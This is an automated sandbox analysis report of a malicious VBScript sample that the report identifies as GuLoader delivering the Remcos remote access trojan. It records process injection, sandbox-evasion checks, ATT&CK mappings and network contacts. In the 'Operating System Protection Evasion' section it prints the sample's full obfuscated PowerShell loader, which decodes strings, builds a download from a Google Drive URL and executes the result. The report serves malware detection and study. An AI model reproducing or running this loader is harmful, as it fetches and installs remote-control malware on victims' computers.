              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: Initial file Initial file: Do While Pseudogeometry.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4788
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5121
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6893
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2643
              Source: C:\Windows\System32\wscript.exe TID: 1288 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7928 Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188 Thread sleep count: 65 > 30
              Source: PING.EXE, 00000007.00000002.1286525521.0000022984667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
              Source: wscript.exe, 00000000.00000002.1292419466.00000256F9CA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.1289985584.00000256F9CA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}N
              Source: wscript.exe, 00000000.00000003.1280362346.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291092539.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1282555662.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281066678.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280887480.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1293081109.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.AJj
              Source: wscript.exe, 00000000.00000003.1280362346.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291092539.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1282555662.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281066678.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1290600846.00000256FBB04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1280887480.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1293081109.00000256FBB60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1293081109.00000256FBB08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1282406624.00000256FBB08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291092539.00000256FBB07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1281222658.00000256FBAE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000009.00000002.1547484456.0000013AE70E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match File source: amsi64_7424.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3930000
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? 
,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le OeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" (same obfuscated command line as above, lowercased)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-B04NAT
              Source: Yara match File source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 321 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 321 Scripting | 311 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Behavior Graph ID: 1633356, Sample: CO894GOV2O25.vbs, Startdate: 10/03/2025, Architecture: WINDOWS, Score: 100

              Sample signatures: Malicious sample detected (through community Yara rule); Yara detected GuLoader; Yara detected Powershell download and execute; 5 other signatures
              DNS/IP: drive.usercontent.google.com; drive.google.com; Host_6637.6637.6637.657e

              Processes:
              • wscript.exe (started)
                Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
                • powershell.exe (started)
                  Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
                  DNS/IP: drive.usercontent.google.com 142.250.185.97, 443, 49690, 49698 GOOGLEUS United States; drive.google.com 216.58.212.174, 443, 49688, 49689 GOOGLEUS United States
                  • conhost.exe (started)
                • PING.EXE (started)
                  • conhost.exe (started)
              • powershell.exe (started)
                Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
                • msiexec.exe (started)
                  Signatures: Detected Remcos RAT
                • conhost.exe (started)
              • msiexec.exe (started)

              Source | Detection | Scanner | Label | Link
              CO894GOV2O25.vbs | 11% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              http://go.microsoft.c | 0% | Avira URL Cloud | safe |
              http://go.microsoft.ce | 0% | Avira URL Cloud | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
              drive.google.com | 216.58.212.174 | true | false | | high
              drive.usercontent.google.com | 142.250.185.97 | true | false | | high
              Host_6637.6637.6637.657e | unknown | unknown | false | | high
                                                                                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                  216.58.212.174 | drive.google.com | United States | | 15169 | GOOGLEUS | false
                                                                                  142.250.185.97 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1633356
                                                                                  Start date and time:2025-03-10 09:17:56 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 7m 39s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:21
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:1
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:CO894GOV2O25.vbs
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.expl.evad.winVBS@12/9@3/2
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 74%
                                                                                  • Number of executed functions: 48
                                                                                  • Number of non-executed functions: 7
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .vbs
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 199.232.210.172, 2.16.100.168, 88.221.110.91, 23.60.203.209, 4.175.87.197
